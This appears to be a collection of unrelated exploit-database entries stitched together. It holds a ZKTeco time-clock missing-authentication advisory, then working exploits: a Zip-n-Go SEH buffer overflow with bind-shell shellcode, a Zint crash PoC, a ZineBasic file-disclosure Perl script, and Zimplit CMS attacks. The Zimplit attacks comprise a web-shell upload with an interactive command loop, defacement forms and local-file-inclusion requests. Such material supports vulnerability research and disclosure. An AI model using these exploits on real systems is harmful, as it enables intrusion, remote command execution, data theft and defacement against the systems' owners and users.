Affected Versions: potentially versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210)
Fixed Versions: firmware version 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720), firmware version 15.00 (ZMM200-220-210)
Vulnerability Type: Missing Authentication
Security Risk: medium
Vendor URL: https://zkteco.eu/company/history
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-003
Advisory Status: published
CVE: CVE-2022-42953
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42953
Introduction
============
"Time attendance and workforce management is an integrated set of
processes that an institution uses to optimize the productivity of its
employees on the individual, departmental, and entity-wide levels.
ZKTeco has been at the forefront of time attendance solutions for the
last 30 years, integrating advanced biometric technologies with
innovative and versatile terminals." (from company website)
More Details
============
The ZKTeco ZEM/ZMM device allows to store a list of users and their credentials
which may be used to log into the device to prove the users' attendance. These
credentials can either be a PIN, a card for a variety of card readers, or a
fingerprint. The user list can be managed through the web interface.
When opening the web interface, for example on http://192.0.2.1/,
the web server of the device sends a Set-Cookie header for a cookie with
name and value similar to the following:
-----------------------------------------------------------------------
Set-Cookie: SessionID=1624553126; path=/;
-----------------------------------------------------------------------
It was determined that the value of the cookie is roughly the number of
seconds since January 1, 1970. Since the value has a constant offset,
that might allow attackers to guess the cookie value. After setting the
cookie, the webserver redirects the browser to "/csl/login". The login
form provided at this URL has its form action set to "/csl/check". If
the user provides wrong credentials, the web server responds with an
error message. If the user provides correct credentials, the server
responds with a frameset.
In this frameset various options are available, for example a user list.
The list contains a link titled "Options" for each user item which
references a URL similar to the following
http://192.0.2.1/csl/user?did=0&uid=123
Additionally, backups of all settings of the device can be downloaded
from the backup page. The request to do so looks similar to the
following:
-----------------------------------------------------------------------
POST /form/DataApp HTTP/1.1
Host: 192.0.2.1
User-Agent: Mozilla/5.0
Cookie: SessionID=1624553126
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://192.0.2.1
Referer: http://192.0.2.1/form/Device?act=11
style=1
-----------------------------------------------------------------------
When the value "1" is given for the field named "style", the web server
responds with the file "device.dat" (corresponding to the option "Backup
System Data" in the web interface), for all other values the server
responds with the file "data.dat" (corresponding to the option "Backup
User Data" in the web interface). Both files can not only be requested
using HTTP-POST, but also using HTTP-GET with the following URLs:
http://192.0.2.1/form/DataApp?style=1
http://192.0.2.1/form/DataApp?style=0
Both files are - even though it's not obvious from the filename -
compressed tar archives. They can be extracted in the following way:
-----------------------------------------------------------------------
$ mv data.dat data.tgz
$ tar xvzf data.tgz
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/group.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/htimezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/lockgroup.dat
rwxrwxrwx 500/513 10512 2021-06-23 07:23 mnt/mtdblock/ssruser.dat
rwxr-xr-x root/root 819896 2021-06-18 07:23 mnt/mtdblock/tempinfo.dat
rwxrwxrwx 500/513 19456 2005-05-05 07:05 mnt/mtdblock/template.dat
rw-r--r-- root/root 360448 2021-06-18 07:23 mnt/mtdblock/templatev10.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/timezone.dat
rwxrwxrwx 500/513 1372 2005-05-05 07:25 mnt/mtdblock/user.dat
rwxr-xr-x root/root 120 1970-01-01 01:08 mnt/mtdblock/data/alarm.dat
rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat
rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/group.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat
rwxr-xr-x root/root 54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat
rwxr-xr-x root/root 33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat
rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat
rwxr-xr-x root/root 660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat
rwxrwxrwx 500/513 0 2013-05-04 01:28 mnt/mtdblock/data/template.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat
rwxr-xr-x root/root 952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/user.dat
rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat
-----------------------------------------------------------------------
In this archive, the file "mnt/mtdblock/templatev10.dat" will likely
contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains
the user database. The user database contains 72 byte user records, each
containing the privilege level, the PIN, the name of the user, data
stored on external authentication tokens like cards, and the group of
the user.
While the cookie value might be guessable, it is not used for
authentication purposes. An attacker with knowledge of the
corresponding URLs could access the user detail view or the backup
without any authentication.
Proof of Concept
================
http://192.0.2.1/form/DataApp?style=1
http://192.0.2.1/form/DataApp?style=0
http://192.0.2.1/csl/user?did=0&uid=123
Workaround
==========
Network access to the device should be limited to trustworthy persons.
This might be hard to implement if the device is installed in a public
space, especially if it is used for access control, too.
Fix
===
Currently, it is not known whether a newer version might fix this issue.
Due to the age of the product, the vendor might decide not to create a
fix at all.
Security Risk
=============
Attackers with network access to a ZKTeco ZEM/ZMM time attendance device
can get access to employee data, including the credentials used for
accessing the time attendance device. If these credentials are used for
other purposes than time attendance, such as physical access control,
attackers might use them to gain access to protected areas. The actual
risk estimate varies wildly with the kind of access control system in
place and whether network access to the device is prevented by other
means, such as nearby security guards. For this reason, missing
authentication to the ZEM/ZMM web interface is estimated to pose a medium
risk. This estimate might need to be adjusted to the specific use case
of the device.
Timeline
========
2021-06-24 Vulnerability identified
2021-07-12 Customer approved disclosure to vendor
2021-07-16 Vendor notified
2021-08-20 Vendor provides fixed firmware
2022-09-29 Customer approved release of advisory
2022-10-10 CVE ID requested
2022-10-15 CVE ID assigned
2022-10-24 Advisory published
References
==========
https://zkteco.eu/company/history
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
source: https://www.securityfocus.com/bid/62949/info
Ziteman CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/admincss/default.asp
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : Zip-n-Go v4.9 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://mc1soft.com/index.shtml #
# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#
# Disclosure Timeline:
# ====================
# 05-28-18: Contacted vendor, no response
# 05-30-18: Contacted vendor again, responded with patch and requested further testing
# 05-30-18: Patch did not seem to fix the problem and alternative approach were suggested
# 05-31-18: Vendor applied new patch and requested further testing
# 05-31-18: The new patch nullified the vulnerability
# 06-03-18: Version 4.95 was released
# 06-03-18: Proof of concept exploit published
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
#Payload size: 710 bytes
shellcode = ""
shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6e\x62\x43\x30"
shellcode += "\x45\x50\x73\x30\x61\x70\x6d\x59\x7a\x45\x46\x51"
shellcode += "\x39\x50\x72\x44\x4e\x6b\x52\x70\x30\x30\x6c\x4b"
shellcode += "\x52\x72\x56\x6c\x6c\x4b\x73\x62\x37\x64\x4c\x4b"
shellcode += "\x32\x52\x51\x38\x54\x4f\x6f\x47\x31\x5a\x61\x36"
shellcode += "\x50\x31\x79\x6f\x4c\x6c\x35\x6c\x31\x71\x51\x6c"
shellcode += "\x47\x72\x46\x4c\x71\x30\x59\x51\x5a\x6f\x44\x4d"
shellcode += "\x56\x61\x6b\x77\x38\x62\x69\x62\x72\x72\x43\x67"
shellcode += "\x6e\x6b\x43\x62\x32\x30\x6c\x4b\x33\x7a\x55\x6c"
shellcode += "\x6c\x4b\x32\x6c\x34\x51\x34\x38\x6d\x33\x37\x38"
shellcode += "\x57\x71\x4a\x71\x66\x31\x6c\x4b\x42\x79\x51\x30"
shellcode += "\x65\x51\x59\x43\x4c\x4b\x52\x69\x45\x48\x6b\x53"
shellcode += "\x77\x4a\x47\x39\x4e\x6b\x76\x54\x4e\x6b\x46\x61"
shellcode += "\x58\x56\x36\x51\x59\x6f\x6e\x4c\x49\x51\x4a\x6f"
shellcode += "\x76\x6d\x35\x51\x68\x47\x57\x48\x49\x70\x62\x55"
shellcode += "\x48\x76\x56\x63\x31\x6d\x4a\x58\x55\x6b\x73\x4d"
shellcode += "\x35\x74\x33\x45\x4b\x54\x52\x78\x6c\x4b\x46\x38"
shellcode += "\x51\x34\x56\x61\x59\x43\x33\x56\x6c\x4b\x76\x6c"
shellcode += "\x50\x4b\x4e\x6b\x46\x38\x75\x4c\x67\x71\x68\x53"
shellcode += "\x6c\x4b\x34\x44\x4e\x6b\x47\x71\x78\x50\x4b\x39"
shellcode += "\x47\x34\x57\x54\x55\x74\x33\x6b\x33\x6b\x55\x31"
shellcode += "\x31\x49\x50\x5a\x42\x71\x4b\x4f\x4b\x50\x31\x4f"
shellcode += "\x31\x4f\x72\x7a\x4c\x4b\x54\x52\x6a\x4b\x6c\x4d"
shellcode += "\x31\x4d\x62\x48\x46\x53\x50\x32\x77\x70\x43\x30"
shellcode += "\x72\x48\x70\x77\x30\x73\x35\x62\x43\x6f\x50\x54"
shellcode += "\x70\x68\x72\x6c\x71\x67\x67\x56\x47\x77\x49\x6f"
shellcode += "\x68\x55\x6e\x58\x4c\x50\x43\x31\x45\x50\x53\x30"
shellcode += "\x46\x49\x78\x44\x33\x64\x62\x70\x50\x68\x76\x49"
shellcode += "\x4f\x70\x42\x4b\x43\x30\x69\x6f\x69\x45\x73\x5a"
shellcode += "\x67\x78\x31\x49\x42\x70\x6a\x42\x59\x6d\x71\x50"
shellcode += "\x32\x70\x73\x70\x36\x30\x70\x68\x78\x6a\x36\x6f"
shellcode += "\x69\x4f\x6d\x30\x6b\x4f\x69\x45\x4f\x67\x63\x58"
shellcode += "\x47\x72\x47\x70\x36\x71\x31\x4c\x6c\x49\x59\x76"
shellcode += "\x70\x6a\x74\x50\x31\x46\x61\x47\x45\x38\x4f\x32"
shellcode += "\x69\x4b\x54\x77\x35\x37\x79\x6f\x6a\x75\x66\x37"
shellcode += "\x51\x78\x4d\x67\x39\x79\x37\x48\x59\x6f\x39\x6f"
shellcode += "\x6a\x75\x62\x77\x61\x78\x43\x44\x68\x6c\x37\x4b"
shellcode += "\x68\x61\x69\x6f\x4a\x75\x70\x57\x5a\x37\x52\x48"
shellcode += "\x74\x35\x32\x4e\x52\x6d\x45\x31\x39\x6f\x4a\x75"
shellcode += "\x71\x78\x71\x73\x30\x6d\x32\x44\x65\x50\x4f\x79"
shellcode += "\x69\x73\x36\x37\x32\x77\x36\x37\x70\x31\x7a\x56"
shellcode += "\x51\x7a\x56\x72\x53\x69\x36\x36\x7a\x42\x49\x6d"
shellcode += "\x43\x56\x78\x47\x33\x74\x31\x34\x37\x4c\x67\x71"
shellcode += "\x46\x61\x6e\x6d\x53\x74\x34\x64\x62\x30\x6a\x66"
shellcode += "\x65\x50\x71\x54\x66\x34\x52\x70\x72\x76\x36\x36"
shellcode += "\x32\x76\x31\x56\x70\x56\x30\x4e\x53\x66\x52\x76"
shellcode += "\x31\x43\x32\x76\x52\x48\x64\x39\x38\x4c\x65\x6f"
shellcode += "\x4f\x76\x49\x6f\x78\x55\x4b\x39\x49\x70\x50\x4e"
shellcode += "\x53\x66\x31\x56\x79\x6f\x34\x70\x50\x68\x65\x58"
shellcode += "\x4e\x67\x57\x6d\x63\x50\x79\x6f\x38\x55\x4d\x6b"
shellcode += "\x68\x70\x78\x35\x6d\x72\x62\x76\x72\x48\x6d\x76"
shellcode += "\x4d\x45\x6f\x4d\x4f\x6d\x39\x6f\x4b\x65\x37\x4c"
shellcode += "\x77\x76\x71\x6c\x46\x6a\x6f\x70\x39\x6b\x4d\x30"
shellcode += "\x74\x35\x33\x35\x6f\x4b\x61\x57\x77\x63\x52\x52"
shellcode += "\x50\x6f\x32\x4a\x73\x30\x32\x73\x6b\x4f\x78\x55"
shellcode += "\x41\x41"
####################### ZIP File Structure ########################
###################################################################
######################## Local File Header ########################
LocalFileHeader = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00' # general purpose bit flag
LocalFileHeader += '\x00\x00' # compression method
LocalFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += '\x00\x00\x00' # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
LocalFileHeader += '\x00\x00' # extra field length
LocalFileHeader += '\x00' # file name
#LocalFileHeader += '\x00' # extra filed
################## Central Directory File Header ##################
CDFileHeader = '\x50\x4b\x01\x02' # cd file header signature
CDFileHeader += '\x14\x00' # version made by 0x14 = 20 -> 2.0
CDFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader += '\x00\x00' # general purpose bit flag
CDFileHeader += '\x00\x00' # compression method
CDFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader += '\x00\x00\x00\x00' # CRC-32
CDFileHeader += '\x00\x00\x00\x00' # compressed size
CDFileHeader += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
CDFileHeader += '\x00\x00' # extra field length
CDFileHeader += '\x00\x00' # file comment length
CDFileHeader += '\x00\x00' # disk number where file starts
CDFileHeader += '\x01\x00' # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader += '\x24\x00\x00\x00' # external file attributes
CDFileHeader += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader += '\x00' # file name
#CDFileHeader += '\x00' # extra field
#CDFileHeader += '\x00' # file comment
################ End of Central Directory Record ##################
EOCDRHeader = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader += '\x00\x00' # number of this disk
EOCDRHeader += '\x00\x00' # disk where central directory starts
EOCDRHeader += '\x01\x00' # number of central directory records on this disk
EOCDRHeader += '\x01\x00' # total number of central directory records
EOCDRHeader += '\x12\x10\x00\x00' # size of central directory 0x1012 = 4114 bytes
EOCDRHeader += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive
EOCDRHeader += '\x00\x00' # comment length
#EOCDRHeader += '\x00' # comment
Witchcraft = '\x54' # PUSH ESP * save stack pointer
Witchcraft += '\x5F' # POP EDI
Witchcraft += '\x54' # PUSH ESP * calculate offset for decoder
Witchcraft += '\x58' # POP EAX
Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111
Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111
Witchcraft += '\x2D\x53\x25\x22\x22' # SUB EAX,22222553
Witchcraft += '\x50' # PUSH EAX
Witchcraft += '\x5C' # POP ESP
#https://github.com/ihack4falafel/Slink
#root@kali:/opt/Slink# python Slink.py * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'
#Enter your shellcode: 9089FC89F8058C050000FFE0
#[+] Shellcode size is divisible by 4
#[+] Encoding [e0ff0000]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x11\x11\x77\x61" ## add eax, 0x61771111
Witchcraft += "\x05\x11\x11\x66\x51" ## add eax, 0x51661111
Witchcraft += "\x05\x11\x11\x55\x61" ## add eax, 0x61551111
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
#[+] Encoding [058c05f8]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x74\x13\x46\x13" ## add eax, 0x13461374
Witchcraft += "\x05\x64\x13\x45\x13" ## add eax, 0x13451364
Witchcraft += "\x05\x53\x12\x34\x12" ## add eax, 0x12341253
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
#[+] Encoding [89fc8990]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x41\x44\x76\x44" ## add eax, 0x44764441
Witchcraft += "\x05\x41\x44\x65\x44" ## add eax, 0x44654441
Witchcraft += "\x05\x41\x34\x54\x34" ## add eax, 0x34543441
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
Evil = '\x41' * 3066 # offset to shellcode
Evil += shellcode # bind shell
Evil += '\x43' * (716-len(shellcode)) # shellcode host
Evil += Witchcraft # magic!
Evil += '\x42' * (126-len(Witchcraft)) # witchcraft host
Evil += '\x74\x80\x75\x80' # nSEH - short jump backward (jump net)
Evil += '\x6e\x4c\x40\x00' # SEH - pop ecx, pop ebp, retn in zip-n-go.exe
Evil += '\x41' * (4064-3908-4-4)
Evil += '.txt'
buffer = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader
try:
f=open("Evil.zip","w")
print "[+] Creating %s bytes evil payload.." %len(Evil)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
# Exploit Title: Zint Barcode Generator 2.6 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.zint.org.uk
# Software Link: https://sourceforge.net/projects/zint/files/latest/download
# Version: 2.6
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Add 2D Component / 2D Component Data
#!/usr/bin/python
buffer = "A" * 44450
payload = buffer
try:
f=open("exp.txt","w")
print "[+] Creating %s bytes evil payload." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created."
# Title: ZineBasic 1.1 Remote File Disclosure Exploit
# Author: bd0rk || East Germany former GDR
# Tested on: Ubuntu-Linux
# Vendor: http://w2scripts.com/news-publishing/
# Download: http://downloads.sourceforge.net/project/zinebasic/zinebasic/v1.1/zinebasic_v1.1_00182.zip?r=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fzinebasic%2F&ts=1474313108&use_mirror=master
# Twitter: twitter.com/bd0rk
#Greetings: zone-h.org, Curesec GmbH, SiteL GmbH, i:TECS GmbH, rgod, GoLd_M
----------------------------------------------------------------------------------
=> Vulnerable sourcecode in /zinebasic_v1.1_00182/articleImg/delImage.php line 12
=> Vulnerable snippet: $id = $_GET['id'];
----------------------------------------------------------------------------------
Exploitcode with little error inline 25-->'Gainst script-kiddies! || Copy&Paste:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
sub ex()
{
print "Usage: perl $0 someone.com /ZineBasic_Dir/\n";
print "\nZineBasic 1.1 Remote File Disclosure Exploit\n";
print "\ Contact: twitter.com/bd0rk\n";
($host, $path, $under, $file,) = @ARGV;
$under="/articleImg/";
$file="delImage.php?id=[REMOTE_FILE]";
my $target = "http://".$host.$path.$under.$file;
my $usrAgent = LWP::UserAgent->new();
my $request = $usrAgent->get($target,":content_file"=>"[REMOTE_FILE]");
if ($request->is_success)
{
print "$target <= JACKPOT!\n\n";
print "etc/passwd\n";
exit();
}
else
{
print "Exploit $target FAILED!\n[!].$request->status_line.\n";
exit();
}
source: https://www.securityfocus.com/bid/53990/info
Zimplit CMS is prone to multiple local file-include vulnerabilities and an arbitrary file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
Zimplit CMS 3.0 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Zimplit CMS v3.0 <= (FU/XSRF/LFI) Multiple Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com
# platform : php
# Type : Multiple Vulnerabilities
# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 (En)
# Download : [http://www.zimplit.com/order.html]
###
# <3 <3 Greetings t0 Palestine <3 <3
# Exploit's / p0c's ====>
##### Exp(1) Arbitrary File/Shell Upload =>
<!-- p0c (1) -->
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n|==================================================|";
print "\n| Zimplit CMS v3.0 <= Arbitrary Shell Upload |";
print "\n| Provided By KedAns-Dz <ked-h[at]hotmail[.]com> |";
print "\n|==================================================|\n";
if ($argc < 2)
{
print "\nUsage : php $argv[0] [host] [path]";
print "\nExample : php $argv[0] www.p0c.tld /zimplit/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--31337\r\n";
$data .= "Content-Disposition: form-data; name=\"File\"; filename=\"k3d.php\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--31337--\r\n";
$packet = "POST {$path}/zimplit.php?action=upload&folder=editor/files HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=31337\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\n Inj3ct0rK3d-Sh3lL#";
$cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
if ($cmd != "exit")
{
$packet = "GET {$path}k3d.php{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n"; # for Encoded You'r Shell
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
<!-- p0c (2) -->
<form action="http://[Target]/zimplit.php?action=upload&folder=editor/files" method="post">
<input type="file" name="file" size="50"/>
<input type="hidden" name="file" />
<input type="submit" value="Upload Sh3ll/File !" />
</form>
[+] Access Shell http://[Target]/editor/files/k3d.php
[+] Access Shell http://[Target]/editor/files/{ U R Shell }.*
##### Exp(2) Edit HTML (index.html) File =>
<form action='http://[target]/zimplit.php?action=save&file=index.html' method='post'>
<textarea id="html" name="html">
<center>
<h1> HaCked By KedAns-Dz </h1>
</center>
</textarea>
<input type='submit' value='Edit HTML Page'>
</form>
##### Exp(3) Add new HTML File/Page =>
<form action='http://[target]/zimplit.php?action=new&file=dz0.html' method='post'>
<textarea id="html" name="html">
<center>
<h1> HaCked By KedAns-Dz </h1>
</center>
</textarea>
<input type='submit' value='Creat new HTML Page'>
</form>
##### Exp(4) Local File Include =>
<!-- p0c (1) -->
<form action='http://[target]/zimplit.php?action=load&file=../../../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Included Local File'>
</form>
<!-- p0c (2) -->
<?php
$lfi =
curl_init("http://[Target]/editor/zimplit_js.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>
<!-- p0c (3) -->
<?php
$lfi =
curl_init("http://[Target]/editor/user.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>
#### << ThE|End
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke
# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================